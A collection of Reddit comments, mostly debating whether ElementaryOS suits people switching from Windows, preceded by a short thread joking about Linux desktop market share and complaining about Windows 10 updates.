The last windows 10 update was the final straw for me, it took forever to install on my pc and a whole workday (!) on my wife's laptop to install.  Forced reboots, ads, unwanted apps that keep on installing after every update, forced updates that take way too long to install and after every major update there are things that are broken like bluetooth profiles.  

I was so fed up with windows i spent the weekend converting my HTPC to linux (running kodi, retro arch and steam) and my GPD pocket laptop is now also running linux (kubuntu).
Still have to reinstall my wife's laptop and i intend on dual booting my own pc with linux and windows 10 since i play some games that don't run under linux unfortunately.    

Windows 10 is a good OS in itself but Microsoft ruined it completely with its forced updates, ads and installing unwanted apps.  
Let's make it 13.37!
Thanks to wannacry & co 🎉
Using it since 2006, haven't been disappointed :) one sad thing is how nvidia is such a bitch about not giving us the stuff we need to build better drivers and take advantage. They'll always lick windows ass i guess. 
Y E A R
O F
T H E
L I N U X
D E S K T O P
I'll play devil's advocate but its purely because of ChromeOS. 

"But $CURRENT_YEAR is the year of the Linux desktop"

No, its not. Chrome is doing MASSIVE gains in education.
Linux makes great computers.
Now all those regular users will definitely start paying attention to Linux...
I would feel better about this if Linux's success were based on its technical merits, rather than living in the fortunate position of having the broadest hardware and software support of any desktop platform not encumbered by MS' horrible business practices.
2017, year of linux desktop!
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/linux_gaming] [Linux reached 3.37% marketshare according to netmarketshare.com • r\/linux](https://np.reddit.com/r/linux_gaming/comments/6xe0sq/linux_reached_337_marketshare_according_to/)

- [/r/linuxcirclejerk] [LINUX Marketshare is now at 13.37%!!!](https://np.reddit.com/r/LinuxCirclejerk/comments/6xfh5s/linux_marketshare_is_now_at_1337/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
Onward ! https://www.youtube.com/watch?v=8-Y0h5tATCI
Well with the way the desktop market is going at least 1% is servers 
[deleted]
# UPDATE

**So, elementary os' founder commented on this post and unfortunately, they think all the people that agreed with my post are wrong.**
**oh well, my point still stands. eos is not fit for windows users. Notice that I didn't say eos is a bad distro here. I've made my points clear. Windows users are more likely to dislike eos than not and when it ends up being a bad experience, only linux community as a whole is blamed. You can call me a troll or r/linux a cesspool, it won't change the fact that eos will have a huge learning curve compared to distros like zorin or mint which basically present their UI in a windows like way (or mac, if you use zorin pro). You have to ask yourselves this, do we really want them to relearn how to use their computer or switch to linux and use it as a daily driver with least amount of efforts?**
https://twitter.com/DanielFore/status/1468264858835587073


Consider this a rant but I don't think ElementaryOS should ever be presented to Windows users as a choice. It does more harm than good and every single person I've ever gotten to try ElementaryOS has had problems with it and in the end they end up thinking Linux as a whole sucks compared to Windows.

Yesterday, it popped up in r/Windows again and I'm honestly infuriated now. ElementaryOS is NEVER a good choice for Windows users because of these reasons:

1. The desktop looks and functions nothing like Windows! It never will, please stop pretending they'll adjust! The point is to do away with the learning curve, not make it more complicated.
2. The store is the most restrictive thing I've ever seen in a distro! *"Oh but I can explain what flatpaks and snaps are"*, really? Even if you explain to them, they still won't be able to install Flatpaks from the store because they simply don't exist there! You have to do a workaround hack to even install popular apps and even then the OS won't stop annoying them with a 'Non-curated' or 'Untrusted' labels.
3. *"Oh but they already download EXEs from internet".* Sure, let's get them to find and download DEBs, what? It doesn't work!? No app for installing DEBs. What about RPM? Nope. Tarballs? Nope. Well, might as well go back to using Windows then.
4. Double click to open files, single click to open folders. If that won't annoy the hell out of a Windows user, I don't know what will.
5. No minimize button, which is basically like oxygen to Windows users.
6. No tray icons. Can you imagine a Windows user having Discord without a tray icon or closing a background app without it? Yeah, me neither.
7. Close button on the left side, maximize on the right, must be very convenient.
8. No Fractional Scaling and it's almost 2022.
9. Default applications that are extremely limited and can't do basic things. Wanna play movies in the Videos app? Good luck, no codec support. Wanna sync calendar from email? Good luck, not supported.
10. No desktop icons. Yep.

So you see, no longtime Windows user will ever like ElementaryOS as an easy to switch replacement. They might,  if they discover it themselves but a Windows veteran wanting to switch to 'Linux' for the first time? Not a chance.

So please, it's my humble request, please stop recommending ElementaryOS to Windows users and give them a bad taste of the linux experience.

Okay then, who is it fit for? Basically anyone who's never used a computer in their life and all they need are basic apps and don't care about UI familiarities. It's great for your grandma but your Windows gamer nephew? Not so much.

PS: I'd argue the same that it's not fit for MacOS users but for now, let's keep it to Windows. Here's a great video talking about everything wrong with Elementary: [https://youtu.be/NYUIKdIY7Y8](https://youtu.be/NYUIKdIY7Y8)
And i thought pantheon desktop enviroment is sameish as macos, but sounds like they didnt copy it as much as i thought.
Any time any person asks me about which Linux version to use for beginners, my response is:

\- Ubuntu

Why? Compatible with most hardware. Ubuntu care so much about this that it sometimes it includes proprietary microcode in the Kernel. They even test some nvidia drivers to see which one will be less buggy. They even allow installing proprietary codecs. Ubuntu is also the distro that most players first release their software. So, Steam, Spotify, Lutris whatever, they all support Ubuntu. If you have a problem with your distro and you need help from the community, you are very likely to find a solution for Ubuntu. They also support deb files and snap out of the box.

Yeah, Ubuntu is buggy as hell. But it's one step ahead of all the others in being beginner friendly.

I also give honorable mention to Mint. If they supported all install methods (deb, flatpack and snap) they would still be very close to first place. Even so, they wouldn't be the first, since I also use Linux to play games and game vendors only support Ubuntu when some problem arises.
>Double click to open files, single click to open folders. If that won't annoy the hell out of a Windows user, I don't know what will

What the fuck, I would kill myself and I use Ubuntu daily.
Elementary OS was my first Linux distro and I used it for about 3 years. I was coming from a Chromebook which is more restricted than Elementary so all I wanted was Chrome and VLC. I really loved the aesthetic and eventually installed the Tweaks app and added the minimise button. Back then I think you could install .deb files.

I eventually left as I felt they were getting more opinionated about what they would let users do over time and updated the kernel slower than I would have liked.

I think you’re probably right that it’s not the best beginner distro, I would probably send new users to PopOS or Mint. But they gave me a really nice starting experience and I certainly have a soft spot for the OS.
Holy shit how glad am i that i didn't bump into those people when picking where to start off, i'm a linux noob, and i basically only used ubuntu, and pop_os (which is ubuntu based anyways), and as a windows user, i can say, most of the stuff is fine, but there's just so many tutorials out there that just give you commands to copy/paste, and a few months later, they just become outdated, the package they want you to install just doesn't exist anymore, or it does but under a different name. Or you have like 4 sources (for example one from apt, one from the graphical package manager, a .deb file from the softwares website, or a tar) for the same program, and every one misses a different feature or straight up doesn't work

Also, there's some stuff in ubuntu that you straight up can't do in the gui, idk about other distros, but i often found myself having to open terminal, what i'm ok with doing, but i can't have ubuntu as the only os on my pc because nobody else in my house knows how to use it, i'm perfectly happy with using the command line to access and manage my ubuntu server, but i really don't feel like doing it on a pc
[deleted]
Elementary OS was my first distro. Not going to lie, I had a blast using it. The only reason I didn't opt for ubuntu or mint is because I wanted to experience something new, something other than windows. The restricted DE was very handy for me since I loved to experiment with it and it never broke.

Personally, I don't care if it's not like windows. Most new users will have trouble in linux anyways no matter what distro they choose.
Like everyone else, never uses elementary. And now, I no longer feel like I am missing anything.

>4. Double click to open files, single click to open folders. If that won't annoy the hell out of a Windows user, I don't know what will.

This is abject insanity.
I mean, it's all pretty subjective. I know a lot of people love Elementary OS, I gave it a spin on a Live USB, and it wasn't for me. But I don't see it being any more problematic for new users than any other OS. I do really like Linux Mint, and it was the perfect distro for me coming from Windows. But different people like different things. 

I would recommend to anyone seriously considering Linux to do what I did, download a few ISOs of distros you want to try, give the live session a go to see if it fits. Narrow it down to your top two and then pick between them. You might end up liking something you didn't know you would. You'll also get a better feel for the general Linux philosophy and how different DEs work, are similar, and different. Then if you're in love with a particular DE, but like a different distro, try and find a spin that has your favorite DE. If you like it well enough to install then dual boot, use a VM, or wherever works. If you don't like it that well give your second pick a shot. If you just hate everything about it and want it to be Windows then Linux may just not be for you. And that's okay. Windows is fine. Yes it has issues. And yes Microsoft is a butt. But if it's what you know and like then might as well stick with it.
Why would anyone recommend Elementary to Windows users? Mint is tailor-made for Windows users looking to get into Linux! I know people love Elementary, but you shouldn't always recommend your distro of choice to new users. Think about what they need, not what you think is best, otherwise everyone would just recommend Arch and no one would ever get into Linux.
For every derived distribution you go for, the more you get disconnected from the actual developers of the Linux ecosystem.

Ubuntu is already a bit removed, if you go to an Ubuntu derivative or a smaller niche distribution, they have close to no extra developer manpower to deal with any bugs you encounter.

The big distributions, Fedora, openSUSE and Ubuntu have more resources than any of the smaller niche distributions, and if you aren't prepared to fix some stuff you encounter by yourself, you should use a bigger distribution.

In short, don't recommend smaller or niche distros to brand new users.
As much as I see people don't like flatpak here, I am convinced a distro centred around flatpak for packaging such as Silverblue would be the best recommendation for beginners who expect a reliable stable experience. Most of the time this means the software they rely on just works. Flatpaks rarely ever break but you can be sure with the native package distribution, some piece of software will eventually break for the user down the road.

All the other UI/UX stuff, there's no way around it. They just have to adapt and learn. No amount of workarounds (including GUI ones) to make them feel like they are using Windows will ever be good enough. The user experience is just not going to be consisent enough, they have to learn how to use the terminal in the event they need to.
Yeah, Linux Mint is the best OS to start beginners on, in my opinion.
I used to run it, I liked that it look "Macish" to be honest.
I think it's a great OS if you're an Apple refugee.
I got into Linux using SUSE, trying to rescue an XP machine way way way back .
Plot twist: the windows users are recommending it to other windows users so they will stop ranting about how bad is win11.
I thought Elementary OS was supposed to replace Mac OS, not Windows.
I don't think Windows users expect everything to work exactly the same on a new os? Why is that a requirement?
Great points imo. Some of the points, like number 7, reminds me of some other strange UI decisions that to me appear like they are just based on wanting to be different. If you prefer something different, then I think you should be able to change it to be how you want it, but there is nothing wrong with following UI norms.
agreed. until the elementaryOS store is an actual store it's existence is pretty pointless.
Elementary was my first distro out of windows, i sought it BECAUSE it looks different. 🤷 But granted I've had to learn a lot by screwing around with it to make it usable, so ur point is valid for non-tinkerers.
How do they know those 24k people that download eos are switching from windows and not using it as a VM or something else. Their logic is flawed.
[deleted]
I've never heard of anyone recommending Elementary OS to Windows users. It's always either Ubuntu or Mint.
>Double click to open files, single click to open folders. If that won't annoy the hell out of a Windows user, I don't know what will.

:monkaChrist: jfc that sounds like the most cursed file manager default experience. At least pick one.

Personally, I'd just recommend either Ubuntu (Budgie, for sane defaults), Linux Mint, or Pop OS.

Ubuntu just makes following instructions so, so much more clear for users. The problem I have with it is with GNOME, because I can't guarantee that they'd like the UX and once you start playing with Extensions as the GNOME devs do not intend, you start playing with fire. Ubuntu Budgie? Good on-boarding, and very easy customization. Make Desktop Layout Switcher standard please!

Pop OS primarily because of the Pop Shop. Yes, other distro have GUI Software Centers too, but Pop Shop is just the most straightforward for me (it was my first GUI Software Center, and while I like Pamac and Bauh for being even more "all in one", I still like the UX there) which also have Lutris in Pop Shop which is great.

Linux Mint is boring, but it is just the good kind of boring. Also, Flatpak. I freaking love Flatpak. As an Arch-based user, I'd been pretty Meh on it because AUR. Then I messed up my system, but found out that the Flatpak apps still function just fine. Now, I'm trying to see if I could use Flatpak first, and I respect Mint's decision to just put in Flathub. The only annoying thing is that they don't also enable Snap - I, for one, use Authy, so having both just makes it easier.

I also usually also recommend Manjaro GNOME, but make a note that that's best as a second distro, after your first one. Again, make Desktop Layout Switcher the standard! I wish the Manjaro KDE is as good, and if nothing else I hope Steam mentioning them and Linus blasting on them will get their lazybutts moving with what they said about providing better KDE defaults.
Does that mean "Elementary" stands for not-many-features instead of beginner-friendly?
I thought this was gonna be a breakdown of some fundamental flaw with the distro instead of "I don't like the GUI"
People are recommending ElementaryOS to Windows users?  Windows users should be pointed at a KDE-based distro like Kubuntu or something.

KDE is hands-down the most similar to the Windows paradigm.  It's all different under the hood of course, but there's no denying that KDE clearly started with the Windows95 UI paradigm (Start button, etc.) then worked on improving from there.

Oh, and if you have any MacOS switchers, that's who you point at ElementaryOS.  Or Gnome.  Very Mac-like in their UI paradigms.
We should only recommend LFS to beginners so they can  start from the basics.


/s
I think maybe we should stop with the “for windows users” crap.  Linux will never be Windows (Thank God) and presenting it as such hobbles the end result.    Sure you can fool someone into thinking that you are running Windows or MacOS from a few feet away but who cares what the OS looks like it if it “looks” like Windows?  I care more about my productivity.  I want to overcome the challenges of using an alternative OS and if I am not prepared to do that I am making a big mistake.
I never liked elementary and tried it almost every release. For somebody that is trying linux for the first time I totally agree with you, however, if they already have some experience, It is ubuntu and good looking which might be interesting to some people.
NEVER!!!!!!!
IMO the best options for a windows user in order to try Linux are Linux Mint and ZorinOS
I am gnu/Linux user since 1999. I started with RedHat 5.0, back in days when it was called RedHat desktop, and tried lots of different distros until I settled for Arch.

I think back than KDE was in version 1.2 or something and Gnome in 0.9 or something likte that; I don't remember. What strike me, and why I never used any of those, was how similar they were to Windows/Mac experience. I never understood why should I want my system to be either Windows or Mac. If I wanted those, I would use those. I quite early found Afterstep, Blackbox and WindowMaker, and have then moved away, but always preferred my own setups and freedom to tailor the system for my own needs.
Even Nick on The Linux Experiment on YouTube, a self-admitted elementary fanboy, says that it isn’t really suitable for anyone coming from Windows or Mac in its current state. The default browser is unusable. You have to jump through hoops to install Firefox, Chromium/Chrome, and LibreOffice. A usable browser and office suite are like the bare minimum for most computer users.

Someone coming from Windows isn’t likely to want to open a terminal and “sudo apt install firefox” just to get a usable browser. The elementary store has barely any software in it. That’s a huge problem. And the devs are delusional if they think this is easy to use for most folks.
I've been getting downvoted for saying this forever. And Manjaro is terrible for beginners also, while we're at it
I disagree with you.
It is made for new users.
You're talking about converting people from Windows by pleasing them as much as possible. That's a thing on its own and many distros try to do that, whereas ElementaryOS tries to be a user friendly experience in itself, with its own paradigms. This is not against new users, just against people who expect a 1:1 experience mostly with Windows, for which, again, there are other distros.

That said, ElementaryOS is really easy to use and stable and on top it looks good.
I don't like it, but it seems like a great system for the most typical uses who just need a few utilities and web browsing.
Honestly elementaryOS is really inconvenient for beginners. No minimize button out of the box, a really bad store with only some apps inside it and more.
I would recommend something like Linux Mint, Ubuntu or Kubuntu for beginners.
linux != windows, and i think desktops that try to look like windows without being windows will set false expectations
You're right, my man.
I started on Mint about a year ago after messing around with Linux for a long time and that was an amazing fit for a migrating user!
I've never recommended this distro. Usually Ubuntu or Zorin
That's why Manjaro KDE is the best option for beginners. /s
When it comes to new users coming from Windows I think you can’t go wrong with Mint or Zorin. I’ve recently installed mint for my stubborn fathers computer, where he’d been daily driving windows 7 for ages, and it’s been a smooth experience out of the box.
Thank you, great post!
There’s really no room for a nuanced discussion huh?

When I was a kid, new to Linux and only used Windows and Mint for a bit, my dad suggested to try out elementaryOS (and some other distro’s), because I didn’t like using Mint. The fact that elementaryOS was completely different to windows, was a positive. I didn’t assume it worked like windows and in that sense didn’t run into weird issues coming from old habits.

Sure there are some major issues with getting applications and updating the OS, but is the experience really worse than the alternatives thrown around in the thread? And where does the hate for elementaryOS come from? Many comments are about how they try to emulate Apple with a wallet garden. That’s simply not true if you actually do the tiniest bit of research.
look, elementary is not a bad distro, but it certainly doesnt provide the smoothest transition especially for windows users
Ranting about tray icons when there's a dock and a nice launcher sounds terminally windowsbrained to me. Some of these points are valid, but you're reaching a bit.

Adding a link to flathub in the UI if there are no results on AppCenter would fix the only real issue here. The rest are just minor inconveniences.
I'm old and I've never, ever heard anyone recommend anything other than Ubuntu or Mint for new users.
I have never tried ElementaryOS as a beginner, but from what I'm reading here, I'm glad I didn't. These things might appear as minor issues, but they would have been incredibly frustrating and I don't know if I would have been willing to live with them.

I have said it before and I'll gladly say it again: Linux newbies don't need choice, they need Ubuntu. Use regular Ubuntu if you're willing to have a slightly different UI, use Kubuntu or Mint if you want something that's similar to the Windows UI.
Da fuk... Why not just recommend mint? It's the most "it works out of the box" experience I've had in Linux...
>no longtime Windows user will ever like ElementaryOS

TIL I don't exist. I used windows since I can remember and made the full-time switch to elementary this year (Although I've been dual booting for a while). Just because things are different doesn't mean they're wrong or that people can't possibly like them.
>No minimize button, which is basically like oxygen to Windows users.

Oh, come on... I mean, it's not like minimize popped up yesterday as a new thing.

To be perfectly honest, if every DE there is out there didn't have a minimize button, I would've never used Linux either. It's a really convenient button to have on a window, especially if you don't have 3+ monitors (I don't and frankly, don't own even a Full HD monitor, so... yeah, I frequently use the minimize button).

It's the 21st century, those buttons are really helpful and serve a really good purpose.
Can we please stop being this toxic? The only and fatal issue with this “opinion” is that instead of being a simple suggestion on how to improve eos to become more user friendly for Windows users, you are explicitly attacking the eos goal of being one of the available replacements for Windows. You’re not helping the community with this. You are just promoting toxicity and maybe driving any random potential linux user away from this “toxic” community.
Some of the issues here are not issued with ElementaryOS. It is issues with people who want to try Linux, but expect it to be exactly like Windows. If you are not willing to get past at least some growing pains, stay on Windows. To use any kind of Linux desktop OS, issues like these are going to crop up. And if a person can't get through it and goes back to Windows, well fine. But you can't have Windows and not Windows at the same time.
I thought only a tiny minority recommended this weird niche distro. But yeah, we should recommend the new people a Linux distro that's the most used and has the most support, not any shiny new toy that appears.
First of all, I'm not an advocate for ElementaryOS, I don't even use it because it was buggy for me, though, I hope they're going to make it a great distro after all. I'm only pointing out some of your described issues.


1. Are you joking about that one because it's not even close to Windows, it's MacOS, though.

2. Loading Flathub repositories is not a workaround, it's what it's supposed to do. I'm pretty sure someone would easily figure out how to copy paste 2 commands to the terminal. Not saying that having to do that is convenient for a desktop user and they should fix that problem like how Fedora does with 3rd party repositories.

3. I don't know what you mean by deb, rpm, tarball not working, incidentally, if the tarball is broken that's not the distro's problem since the linux build of that app is borked. Also elementary uses deb, not rpm.

8. This is a common problem around Linux distros, fractional scaling on X11 is not a thing since it's a very old protocol - Wayland is going to get that feature in the future. Though, this problem got workarounded by setting the font dpi.


Other problems that have been described here are mostly just preferences, i suppose you can even tweak some of them to your liking.


Ultimately, I would recommend just Ubuntu or Fedora to beginners, they're the only ones that most people have had the stable experience. Fedora even has spins so that's pretty much enough to cover all the desktops. I had backlight problems with Ubuntu, sadly, though, that'll be fixed in the future kernel.


Distros that I wouldn't recommend to beginners would be that list:

- Manjaro; Due to package delaying - which is already a hustle to maintain by delaying - it might cause some breakages especially if you have AUR packages.

- Most Ubuntu Derivatives; Seriously, people think that PopOS works better with Nvidia etc but that's just a marketing lie, Ubuntu can do all that optimus stuff and load proprietary Nvidia drivers with an ease, so do other distros. You might get troubles with ubuntu derivatives since these distros are a hustle to maintain if they dont have some manpower. Mint, exceptionally, is the only distro I can recommend as a Ubuntu derivative. With Elementary, my experience was not stable but as far as I have seen most people have had stable experience so yeah, try it I would say.
While I agree that it shouldn't be recommended to Windows users, it's still my favorite distro. I've used just about every well known distro. I've used bare bones Arch with just a window manager, I've used Gentoo, Fedora, Ubuntu, Nix, Void, you name it. But I haven't felt "at home" anywhere like I do with Elementary OS. It has been my daily driver and development OS for about a year, though I've used it off and on for a few years. I do change a few things, like adding a minimize button and moving the window controls to the right side. And I use APT and install DEBs with Eddy or dpkg for most software I need. It has a very clean, well thought out design. I love the default theme, fonts, wallpapers, and icons. It's just a beautiful and perfectly functional (for me) OS in my opinion. 

Solus (Budgie) is also amazing and it's what I recommend to every new user, and they have all loved it. Budgie is fantastic because you can go for a Windows look or a macOS look.
To be fair, even long-time linux veterans stick to window-like desktops sicj as dke and xfce. Mac Users might feel more at home with Gnome.

But true, I assume people switching from Windows are already putting up with a lot of change, we should not ask for too much.
I always viewed Elementary OS as "Linux for Mac OS Users". I can understand why Mint gets recommended for Windows users trying to make the switch, as Cinnamon replicates the majority of the Windows workflow, however Elementary replicates almost none of that. It is a terrible analog for the Windows desktop/experience. That said, when I tried it out, I felt it was a decent OS for what it did, but in the end, it wasn't for me.
I've been struggling with this too. I love elementary but how they restricted their app store makes it hard for me to recommend. I struggle with Elementary because they do so many good things, I love how much effort they put into how it looks but why limiting their app store to this way it only feels like a distro for experience Linux user that like the mac os.
I recently switched my main os to Linux and had to switch from elementary os after 2 days so many things wouldn't install when using the terminal using Mint now which way more friendly to beginner's
I can argue that I started with elementary and was fascinated with the looks so much that I overlooked the functionality part. Again, for context I came from windows 7 that took 2 minutes to open chrome and the same i3 3200 smtg laptop flew through everything you could throw at it and I couldn't appreciate it enough. Even though elementary has it quirks I'm still biased towards it as it was my first distro and looked much better than my old one. I for one came to expect nothing to work like in windows so was rewarded with a learning experience and now I'm a full time user but I can understand where you're going. A windows veteran would absolutely hate elementary and recommending that to a noob is probably a bad idea. I'd say pop or mint or manjaro would be a better option.
I had elementaryOS on my laptop. For a few hours.

I installed it, realized that I hated it, and promptly switched to Manjaro. Elementary might be good for a macOS user, but IMO it's definitely not a good recommendation to a longtime Windows user. If you like elementaryOS then more power to you, and I'm not gonna shit on the OS or its users. But IMO you're absolutely right, it's not the best recommendation for people coming from Windows.

Personally, my usual recommendation for Linux noobs coming from Windows is Linux Mint. None of the usual Ubuntu annoyances such as snaps, no data collection, and Cinnamon is overall very user friendly and easy to learn for Windows users.
I find it’s easier to just get Windows users started with the Gentoo distribution.

Easier for me, that is. They learn quickly not to ask me computer questions and I can get back to coding.
All of the lipstick of macOS w/o much of the usability. It’s not to say it has none of it - but if the focus was to create a better workflow than most Linux or Windows distros then there’s a lot of work to be performed still. I’m all for the distro existing but my recommendation is “Ubuntu Budgie” it has all workflows desired down pat.

You want macOS type layout? No problem. Windows? Linux? Something in btwn? No problem.

There’s also no attempt at yet another store.. just use Ubuntu’s & focus on the Desktop UX. Elementary’s store in an interesting idea but perhaps not the most useful. As if we needed more fragmentation in Linux.

Ubuntu Budgie, XFCE & Mate are very unopinionated about what or how you want to use your desktop. KDE too but users imo are more likely to get confused & break that DE, or themes than others.
I like the look of Elementary OS, but not some of their design choices. It might be easy for beginners, but I find myself using the terminal too often (not an issue for me, but could be for a beginner).
It looks really cool, but for beginners, not very technically versatile users, xfce or similar might be the more smooth transition.

Personally I like the most and use Gnome with few extensions and customizations, but I'm neither beginners or windows user.
My first distro was arch never looked back
Check the reader ratings at [https://distrowatch.com/table.php?distribution=elementary](https://distrowatch.com/table.php?distribution=elementary)
"Pop OS" is kind of an easy jump in my opinion.
I'm a 20 year user of linux, and i think Elementary OS is confusing AF
What I find funny is that many Linux users complain when a distro resembles MacOS, but many of them also praise distros that look like Windows.
OP is right.
In my opinion ElementaryOS is an operating system in conflict with itself.
Interface is simplistic, but not like Windows at all.
Tries to be like macOS but goes too far with it, to the point that it starts to feel like a tablet with iPadOS as it becomes too restrictive.

Users coming from Windows should stick with Zorin, Linux Mint or Manjaro. A familiar interface with which to get their feet wet with Linux.
I feel like it's quite a good fit for macOS.

App Store that's practically empty and doesn't include the most basic of utilities: \[check\]

Weird AF default browser based on Webkit: \[check\]

Dock: \[check\]

Constant "untrusted" warnings when installing apps outside of the restrictive app store: \[check\]

QuickTime is better than Videos but not good enough for most people, so: \[check\]

"How TF do I close this background app": \[check\]

CMD key: \[check\]

The one thing that will make the switch quite hard is the lack of the menubar and possibly the lack of a DEB installer.
Or maybe we can just stop complaining that not all Linux has to be Windows-like? *shrug*.

Some day the gatekeeping on r/linux will end... some day...
Recommend Linux Mint instead:

- Easy to learn/use without the terminal

- Usable straight out of the box in most cases

- Comfortable desktop environment that is somewhat familiar to Windows users

- Based on Ubuntu so the majority of Linux help results can be applied, as well as software releases

- Cinnamon, while not the most customizable, is still configurable in ways that will begin the experience of YOUR desktop


I will always stand by Linux Mint being the best distro to suggest to newcomers originating from Windows. It was where I started and it was such a good experience and I have heard nothing but good coming from the people I recommend it to. It is very beginner friendly and the community was nice to me and helpful.

I used ElementaryOS once a long time ago, but I do recall it being a hassle to deal with, but I don't recall their store being so strict. Perhaps I was oblivious to it. Used 0.4 and then never again.
[deleted]
Man, I was testing distros to see what to recommend to my gf some months ago when I saw the problems to install "non-authorized" software in ElementaryOS....

While I know it's possible to bypass it, it seems like they made it so you gotta pay for the .deb installer in the store just to be able to do basic things, with that kind of predatory practices and limitations now I get why people say it's apple-like...
Yes, please! Same for Zorin, Salient, Elementary, Endeavour, Manjaro, Garuda and others. They are cool, but toy projects, good for tinkerers and people willing to distro hop. But given their low spread and low amount of developers i cannot recommend them for beginner's daily driver. I don't say people making them did bad work. They invested lots of time and effort to make their dream systems and i do appreciate this. I just consider these distros "go for it, if you know what are you doing". Only derivate distro which got "general purpose desktop" status in my book is Mint. And honestly that is what I recommend for very beginners and installed for my grandmas.
ElementaryOS is probably one of the worst Distros in the sense of usability for me... I gave it a try multiple times by now and not only did I run into weird restrictions put into place by the GUI but I also was unable to easily find options I really needed. Was a while ago tho so can't remember specifics...

It was waaaaay worse than stock Ubuntu tho.
>	So, elementary os' founder commented on this post and unfortunately, they think all the people that agreed with my post are wrong.

She didn’t say your opinion was *wrong*, she said the data appears to contradict your opinion. You keep presenting your personal opinions on what users will feel as definitive facts, but the numbers in her post show that many Windows users *do* choose elementary. This edit really shows that you’re more interested in shitting on a distro you like than you are in improving anything about Linux
Elementary OS was a pain in the ass the first time I tried it
Personally I think the best distro for windows users is probably Linux Mint in my opinion, it's easy to use and relatively stable and has a very similar UI that would be familiar to windows users.
Mint is much better for a windows user
I mean elementaryOS is great for the average user, it is tailored for accessibility, security and ease of use and  they fucking nailed it. Is it great for more advanced users? No.. But that is also not the fucking point
Zoinos and popos are better options for beginners. Mint is ok, but it's stock look is ugly in my opinion.
>The desktop looks nothing like Windows! It never will, please stop pretending they'll adjust!

Should distros then accommodate their UX to be equal to that of Windows, objectively the worst out there, just so that Windows users don't feel bad?


You are confused, OP. Linux is not free Windows (luckily).
Can we just stop trying to convert everyone to Linux?

I've been using Linux since the 1999 and this baffles me about the community.  I care what OS friends and family use as much as I care what brand of shampoo they use.  I'm happy to help someone if they're interested and ask where to get started, etc. but I'm not about to lose any sleep over them going back to Windows or Mac OS.
>The desktop looks nothing like Windows! It never will, please stop pretending they'll adjust!

I'll also never understand the mindset that users coming from Mac/Linux need an exact clone of their home operating system.

&#x200B;

>The store is the most restrictive thing I've ever seen in a distro! "Oh but I can explain what flatpaks and snaps are", really? Even if you explain to them, they still won't be able to install Flatpaks from the store because they simply don't exist there! You have to do a workaround hack to even install popular apps and even then the OS won't stop annoying them with a 'Non-curated' or 'Untrusted' labels.

Complaining about elementary when it's obvious from this statement alone that you never used it. Flatpak's from Flathub are one click installs, and once you add a single Flathub app ALL of the others appear in the store.

&#x200B;

>"Oh but they already download EXEs from internet". Sure, let's get them to find and download DEBs, what? It doesn't work!? What about RPM? Nope. Tarballs? Nope. Well, might as well go back to using Windows then.

Most Ubuntu distros have restrictions on installing .deb packages now. This is not unique to elementary. However elementary supports programs such as Eddy which allows for easy management of deb files.

&#x200B;

>No tray icons. Can you imagine a Windows user having Discord without a tray icon? Yeah, me neither.

Discord is a really bad example for tray icons, who uses the Discord tray icon? I don't even use tray icons on WINDOWS let alone on Linux. The tray icon argument is getting old.

&#x200B;

>So you see, no longtime Windows user will ever like ElementaryOS. They might if they discover it themselves but a Windows veteran trying 'Linux' for the first time? Not a chance.

Another opinion, if not straight up lie.

&#x200B;

>So please, it's my humble request, please stop recommending ElementaryOS to Windows users and give them a bad taste of the linux experience.

It's not humble at all, all you did was complain about an OS that you have clearly never used in any real capacity. You basically watched a video or read an article and want to start a elementary hate circle jerk to validate your opinions.
Instead of making sweeping assumptions regarding how elementary is COMPLETELY unfit for ANY windows user out there, I'll counter your points as someone who is fairly new to Linux, switched from using Windows on my gaming desktop, & has used Pop_OS!, Manjaro, Zorin, & Fedora extensively. I've also recommended elementary to a couple windows refugees who are all happily using the distro & made the transition flawlessly. Here's how I'll counter your list of points:

1. Not everyone I know is hooked on the Windows desktop & how it works; people are willing to try something new. Especially students familiar with Chrome OS.
2. Compared to the Microsoft Store, it is leagues ahead. Weren't we just talking about how everything has to be identical to Windows? I'll ignore the Microsoft store because it is a travesty, but compared to other distros' stores the App Center shines as an example of a straightforward, no-BS user experience. Apps downloaded here won't uninstall your DE (ik this has been fixed but still, c'mon). They will work perfectly with your system.
3. Nobody I know has been fazed by the flatpak stuff, as Windows will warn you similarly when installing pretty much anything & Macs are restrictive about apps downloaded from the Internet so warnings are commonplace. Besides, those labels are necessary because not every flatpak is tailored for elementary OS like the App Center apps are.
4. I must agree, this one will cause a jarring transition. People have complained to me. You make a valid point here.
5. I don't particularly miss it, & nobody I know using elementary has really complained. It isn't that hard to do Super + H. This could go either way though, and while I personally am not in favor of adding it I understand why one would want it.
6. I think you'd be shocked at how little people care. I could care less. My friends using elementary are regular discord users & have not even mentioned it.
7. Mac has all of them on the left. It's different, not worse. Not everyone on Earth is totally repulsed when things take a tiny bit of adjustment.
8. Text scaling scales the entire UI. My brother uses it on a laptop & it really does the trick. You should try it as an alternative to fractional scaling (as it was intended to be) before complaining.
9. The video one I agree with, although VLC provides an easy fix. The calendar one is less of a problem considering how many people just use Google apps in the browser (especially in my age group).
10. This hasn't been a pain point in my experience. Even though I used to use them frequently, this was a very simple adjustment.

People I know who are switching from windows are switching ***because they don't like Windows.*** They don't want a Linux clone of Windows and neither do I; if every facet of the UI is identical, why switch? Why are we as a community prioritizing familiarity with proprietary operating systems & championing it? I enjoy using elementary OS because they do things differently, and I think they should keep going. Making decisions based on what is best for the user instead of what will suck the most people away from the Windows desktop in the short-term is not the path to long-term success, and I fundamentally disagree with the message of this post.

If someone wants to move away from Windows & asks for your help, my advice would be to actually listen to their demands instead of simply plopping them onto the most Windows-like distro because it will be familiar. I've still recommended Zorin to some, & elementary to others, while recommending Manjaro to others still. Every Windows user out there doesn't want exactly what you claim they do in this article. From my perspective, elementary OS "just works," and that is something many other Linux distros cannot claim in my experience.

(Also I would like to clarify that this is meant to be a reasonable & level-headed criticism of your post, and I mean no animosity towards you personally. Your post was well thought-out & I wanted to provide a similarly well thought-out response to provoke discourse rather than discord.)
[deleted]
I'm personally a big fan of Pantheon, elementary's desktop environment. I also like "simple" apps, that do one task and do it well. I personally use GNOME since... ever. Been on Linux since 2004. Used everything.

And I personally hate stuff like KDE with their overconvoluted applications with too many features I'll never use.

**However**, I'm on your side when it comes to recommending elementaryOS to Windows users. But I also don't like people recommending Linux Mint to such folks.

